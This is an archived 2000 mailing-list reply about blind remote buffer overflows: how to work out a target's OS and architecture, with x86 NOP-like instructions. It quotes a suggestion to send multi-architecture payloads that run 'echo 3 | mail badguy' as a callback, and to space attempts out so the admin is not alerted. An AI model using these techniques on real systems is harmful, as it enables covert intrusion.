Vulnerability Development mailing list archives
Re: Blind Remote Buffer Overflow
From: matej () POBOX SK (matej)
Date: Tue, 2 May 2000 08:24:46 +0200
On Mon, May 01, 2000 at 05:59:05PM -0700, Blue Boar wrote:
Some people have mentioned some ways to try to find a vulnerability remotely. Now, lets say you using some way have determined you can rewrite EIP, PC (or whatever it's called on your architecture). What now to do to detect operating system and architecture?In many cases, you will have more than one shot at trying your buffer overflow. One possibility is just trying them all. If the service doesn't auto-restart, then try each arch a week apart, so the admin doesn't get suspicious.
...or try in one shot 3 bufflows for 3 hw platforms :-)
a number of variants (as an example: Linux/i386, Linux/sparc, Windows/i386) which all of them does something like "echo 3 | mail badguy () test com". Depending upon what mail you actually get back, you know that the architecture is at least quite compatible with the envioronents that returns an answer.Who knows their x86 and Sparc opcodes really well?
on x86 I can find couple of such instructions - ranging from completely NOP-like, to some form of semi-NOPs. just think of 'mov eax, eax' or 'jmp $+length_of_instr', or take some of the semi-NOPs - 'and eax, eax' (changes flags, as well as 'or' etc), and think about some instruction pairs - like 'cmc; cmc' (complement cary, twice;-) however, I do not know _nothing_about the sparc instr set... matej
Current thread:
- Re: Blind Remote Buffer Overflow, (continued)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Arturo Busleiman (Apr 30)
- Re: Blind Remote Buffer Overflow Ralph The Wonder Llama (May 01)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Reinier Heeres (May 02)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (May 02)
- Re: Blind Remote Buffer Overflow Jani Ollikainen (May 02)
- Re: Blind Remote Buffer Overflow Granquist, Lamont (May 01)
- Re: Blind Remote Buffer Overflow Matthew R. Potter (Apr 30)
- Re: Blind Remote Buffer Overflow Bluefish (May 01)
- Re: Blind Remote Buffer Overflow Marc (May 01)
- Re: Blind Remote Buffer Overflow Blue Boar (May 01)
- Re: Blind Remote Buffer Overflow matej (May 01)
- Re: Blind Remote Buffer Overflow Pavol Luptak (May 02)
- Ascii-x86 was: Blind Remote Buffer Overflow Bluefish (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Robert Collins (May 03)
- Re: Ascii-x86 was: Blind Remote Buffer Overflow Bill Weiss (May 03)
- firewall audit LEOW Chiun-Yi Jonathan (May 03)
- Re: firewall audit Ron DuFresne (May 03)
- Re: firewall audit antirez (May 04)
- Re: firewall audit Bennett Todd (May 04)
- Re: firewall audit Ron DuFresne (May 04)
- ethernet cards & promisc mode Security Team (May 03)